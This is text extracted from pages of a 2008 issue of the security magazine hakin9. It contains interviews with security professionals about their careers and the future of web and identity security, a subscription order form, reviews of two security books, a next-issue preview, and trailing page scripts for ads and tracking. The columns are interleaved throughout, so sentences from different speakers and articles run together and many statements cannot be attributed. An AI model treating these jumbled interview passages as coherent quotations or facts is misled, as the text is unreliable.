right balance between at Microsoft. He has but my Computer Science background and my security and cost is going to be an ongoing worked at Microsoft own curiosity usually means I have to find out for concern. Solutions that can simplify management for over seven years myself the reality behind any IT concern. and demonstrate a return on security investment in various products are going to help security professionals navigate this including ISA Server, What do you consider your greatest IT related future where costs are an important consideration. MBSA, Windows Vista, success? Secondly, the growth of security services is only Windows Defender, I have been at Microsoft for 7 years and all of it going to increase as network costs are reduced. Internet Explorer 7 and related to security. I previously worked for VA Linux, Some security IT jobs may be outsourced to the Forefront Sun Microsystems, Trilogy and Intel. It was a major service provider, but in these scenarios, having change as Microsoft had a very poor security multiple talents in IT and not just a pure focus in reputation when I started. Being a part of the security will allow those with the proper skills to be progress that Microsoft has made in security is productive in another part of the IT organization and my biggest accomplishment. not dedicated to just security.Where did you get you first PC from? peer update network. Five years passed, it is still In China when IBM released the first PC in early a leading edge technology and would apply to 80s. the new security solution for the new computer threats. What was your first IT-related job? Develop a Chinese system for PCDOS. It will need What are you plans for future? to intercept the keyboard and display events and Make the web security solution which will focus add Chinese processing. From another angle, the to where users do social networking and web hackers use the similar skills to enter the OS level search. to take the control of your computers. What you think will be the greatest pain in Who is your IT guru and why? IT Security professionals' job in the nearest Bing Liu One of my professors in the university who is future? What should they focus on in the first A leader in emerging the leader to build the first mainframe computer place? technology in China and he instructs us the computer It is ID security and user created web content development. He programming in binary code. I learnt from him security. When Web 2.0 technology applies to all is responsible for that no matter how complicated the software business and personal daily activity, it will be the CyberDefender's product technologies, encryption is, it is just for one simple JMP code to great pain that users think they are in the trustful architecture and pass. Computer threat and security solution are environment to communicate with their co- standards. Bing was the twins and will never end. workers and friends on their created web contents the creator of award- but the web contents or web communication may winning products What do you consider your greatest IT related be hijacked and the persons may not the real FirstAID and GuardDog, success? persons they should be. software utilities for PCs, I have created the CyberDefender Threat IT security professionals should focus to the which were acquired by Protection Network with automatically threat solution for the ID protection and content security McAfee. behavior analysis and real-time secure peer to solutions.78 HAKIN9 04/2008 v3 easy ways to subscribe: 1. Telephone Order by phone, just call: 1-917-338-3631 2. Online Order via credit card just visit: www.buyitpress.com/en 3. Post or e-mail Complete and post the form to:Software Media LLC 1521 Concord Pike, Suite 301Brandywine Executive Center Wilmington, DE 19803USA or scan and email the form to: subscription@software.com.pl hakin9 ORDER FORM Payment details: □ USA $49 □ Yes, I’d like to subscribe to hakin9 magazine □ Europe 39€ from issue □ □ □ □ □ □ World 39€ 1 2 3 4 5 6 □ Order information I understand that I will receive 6 issues over the next 12 months. Credit card: (□ individual user/ □ company) □ Master Card □ Visa □ JCB □ POLCARD Title □ DINERS CLUB Name and surname Card no. □□□□ □□□□ □□□□ □□□□ □□□□ address Expiry date □□□□ Issue number □□ Security number □□□ postcode □ I pay by transfer: Nordea Bank tel no. IBAN: PL 49144012990000000005233698 email SWIFT: NDEAPLP2 Date Cheque: □ I enclose a cheque for $ ______Company name (made payable to Software-Wydawnictwo Sp. z o.o.) Tax Identification Number Signed Office position Client’s ID* Terms and conditions: Signed** Your subscription will start with the next available issue. You will receive 6 issues a year. BOOK REVIEWIT Security Interviews Exposed. Secrets to Landing Your Next Information Security Job Positives of the book: High credibility knowing that the authors themselves so actually stemming from the rich background conduct interviews for their various firms will of the book’s contributors, with most build confidence in anyone using it as interview boasting not less than a decade of experience preparatory material. with DOD and NSA, and that means trusted and My only negative experience with the book Author: Chris Butler, Russ Rogers, top-notch information. Reading was a delight, was the TCP state diagram in the network Mason Ferrat et al Publisher: Wiley Publishing, Inc. owing to its well structured nature- all chapters fundamentals section, which I thought could use Pages: 218 Price: $29.99 are organized under several relevant headings. some explanation as it takes some brain-cracking Almost everything is covered, from networking to memorize it (at least that’s what the authors fundamentals to determining the security posture suggest). Throughout, the authors were very of an organization, all without being as wordy realistic in limiting discussion of vendors to three as other books I’ve perused. The chapter on major market players, although I felt that justice Wireless technologies completes it well, listing could be done to other commodity hardware the best-known and commonly used hardware vendors as well. Looking at the background of the on the market-that’s information consultants will authors I’m not surprised at all. In all, IT Security demand a fee for, all for free. Noteworthy too is Interviews Exposed is a well composed briefing the numerous web references that are just a of information security stuff that passes well for Google click away, extending the books pages an interview preparatory material. Kudos to its beyond its 218 pages. Even though it could authors! pass for a manual of information security, its chapters end with an interview Q & A section by Benjamin Aboagye that retains the theme of the book-getting that information security job you so desire. And Risks, Controls, and Security: Concepts and Applications, 1st Edition This book is worth it because it gets and environmental security, Computer and down to the subject and breaks it operations management, System access down for you in a clear and precise control, system development and maintenance, way. Have you ever had trouble reading some Business continuity and management including Security books that was complex and not getting compliance. The book also goes into a basic Author: Vasant Raval, Ashok Fichadia to the point? This book will clear things up. It crash course of Cryptography and public key Publisher: Wiley Publishing, Inc. covers critical Security elements for Enterprise infrastructure, SQL attacks, Buffer over Flows, Pages: 432 Price:$87.95 Security and gives good and essential examples. and other forms of attacks in a neat overview I also liked the visual aspect of the book, they by command line syntax or even screenshots, give you good outlines and topologies that make which could be useful for a beginner. sense but also cover a lot of bases in Security. This book is definitely the book for people starting by Joshua F. Morin out in computer security, penetration testing, and a good resource for directors or management to comprehend security risk and implementation of controls. This book also provides you with many techniques, ethics, regulations, and policies security engineers, programmers, and management should use, such as Security Organization, Asset classification and control, Personnel Security, Physical 80 HAKIN9 4/2008Coming Up in the next issue:You've already read everything? Don't worry! Next issue of hakin9 will be available in two months. In 5/2008 (18), as always, the bestpractical and technical articles for all IT Security specialists. ATTACKREGISTRY ANALYSIS BY HARLAN CARVEYADVANCED SINGLE PACKET AUTHORIZATION WITH FWKNOP BY MICHAEL RASHEXPLOITATION AND DEFENSE OF FLASH APPLICATIONS BY NEIL BERGMANUNCAPPING – CHANGING THE MODEM CONFIGURATION TO UPLOAD THE SPEED OF INTERNET BY CRISTIHAN DIAZ CARRILLOKERNEL HACKING & ANTI-FORENSICS: EVADING MEMORY ANALYSIS BY RODRIGO RUBIRO BRANCOVoIPER: VoIP EXPLOIT RESEARCH TOOLKIT DEFENSESECOND PART OF THE PAPER ON VULNERABILITIES DUE TO TYPE CONVERSION OF INTEGERS BY DAVIDE POZZA CONSUMERS TESTS We help you choose the best data recovery software. Give us your opinion at en@hakin9.org ON THE CD Useful applications both commercial and Open Source Presentation of the most popular security tools Even more video tutorials If you would like to promote your interesting hacking tool, let us know! We will be happy to place it on our CD. Next issue available in September!82 HAKIN9 1/2008 </div> </article> </div> </div> </div> <script type="text/javascript" async crossorigin="anonymous" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8519364510543070"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js" crossorigin="anonymous" referrerpolicy="no-referrer"></script> <script> var docId = 'dd6d0c333466e4c0245f08cf2d36d50e'; var endPage = 1; var totalPage = 84; var pfLoading = false; window.addEventListener('scroll', function () { if (pfLoading) return; var $now = $('.article-imgview .pf').eq(endPage - 1); if (document.documentElement.scrollTop + $(window).height() > $now.offset().top) { pfLoading = true; endPage++; if (endPage > totalPage) return; var imgEle = new Image(); var imgsrc = "//data.docslib.org/img/dd6d0c333466e4c0245f08cf2d36d50e-" + endPage + (endPage > 3 ? ".jpg" : ".webp"); imgEle.src = imgsrc; var $imgLoad = $('<div class="pf" id="pf' + endPage + '"><img src="/loading.gif"></div>'); $('.article-imgview').append($imgLoad); imgEle.addEventListener('load', function () { $imgLoad.find('img').attr('src', imgsrc); pfLoading = false }); if (endPage < 7) { adcall('pf' + endPage); } } }, { passive: true }); </script> <script> var sc_project = 11552861; var sc_invisible = 1; var sc_security = "b956b151"; </script> <script src="https://www.statcounter.com/counter/counter.js" async></script> </html><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>